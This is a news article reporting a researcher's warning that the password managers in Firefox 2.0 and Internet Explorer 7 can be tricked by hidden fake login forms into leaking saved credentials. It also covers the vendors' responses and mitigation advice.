Firefox, IE Vulnerable to Password Theft

A software security researcher has warned that the password manager features of Mozilla's open source Firefox 2.0 and Microsoft's (Nasdaq: MSFT) Internet Explorer (IE) Web browsers could be exploited, placing unsuspecting users at risk.

Users of Firefox or Explorer, both of which may be vulnerable to the attack known as "Reverse Cross Site Request" (RCSR), are not fooled directly by the password theft exploit. Instead, it provides a fake login site that fools a browser's saved password feature into automatically providing the information, Robert Chapin, president of Chapin Information Services, reported.

Neither the latest Firefox 2.0 nor Explorer 7 browser were designed to check the destination of form data before submission, thus making them vulnerable to the weakness.

Because the exploit is actually conducted at a trusted Web site, the user sees a trusted address in the browser bar, according to Chapin.

"Users of both Firefox and Internet Explorer need to be aware that their information can be stolen in this way when visiting blog and forum Web sites at trusted addresses," Chapin wrote for his security site Chapin Information Services (CIS).

Don't Remember My Password

Both Microsoft and Mozilla acknowledged the issue, with the former referring to an investigation, and the latter, which has a bug report on the issue, advising users to turn off the password manager in Firefox until it is fixed.

The password managers in browsers help millions of Internet users log onto blogging, social networking, Web mail, portal and an array of other sites, and the RCSR vulnerability was reportedly exploited on the popular site MySpace, Chapin said.

The RCSR attack could also be combined with a bogus phishing site to target the attack for more valuable passwords and information, such as online banking, IT-Harvest Chief Research Analyst Richard Stiennon told TechNewsWorld.

"From here on out, best practice is going to be to stop using [password managers]," he said.

Bigger Hole for Firefox

The vast majority of Internet attacks and scams are aimed at Windows users, and while Firefox typically enjoys a security advantage because of its separation from the operating system and faster response to issues, the RCSR is one instance in which the open source browser may be more risky than IE, according to Chapin. He said he reported the issue to Mozilla earlier this month.

While neither browser bolsters password protection for the RCSR scheme, Firefox automatically fills in saved user names and passwords when presented with bogus sign-in forms, Chapin warned.

"This behavior does not occur in Internet Explorer unless the RCSR form appears on the same page as a legitimate login form," he pointed out.

Mozilla, which has displayed the speed and transparency advantages of its open source development for security before, is reportedly working on a fix.

Hidden Danger

The password manager vulnerability is made worse by the fact that the fake sign-in forms can be completely hidden from view, Chapin reported, thus allowing a saved password to be transmitted to another site unwittingly by clicking an invisible image link.

Chapin recommended changes for both Firefox and Explorer, adding that Webmasters should review server code for the possibility of RCSR and cross-site scripting (XSS) injections, particularly for encrypted sites.

Attacks leveraging the password manager weaknesses could work against firewalled, local network servers and HTTPS addresses that would not otherwise be available, because no direct access or client-side scripting is needed, Chapin said.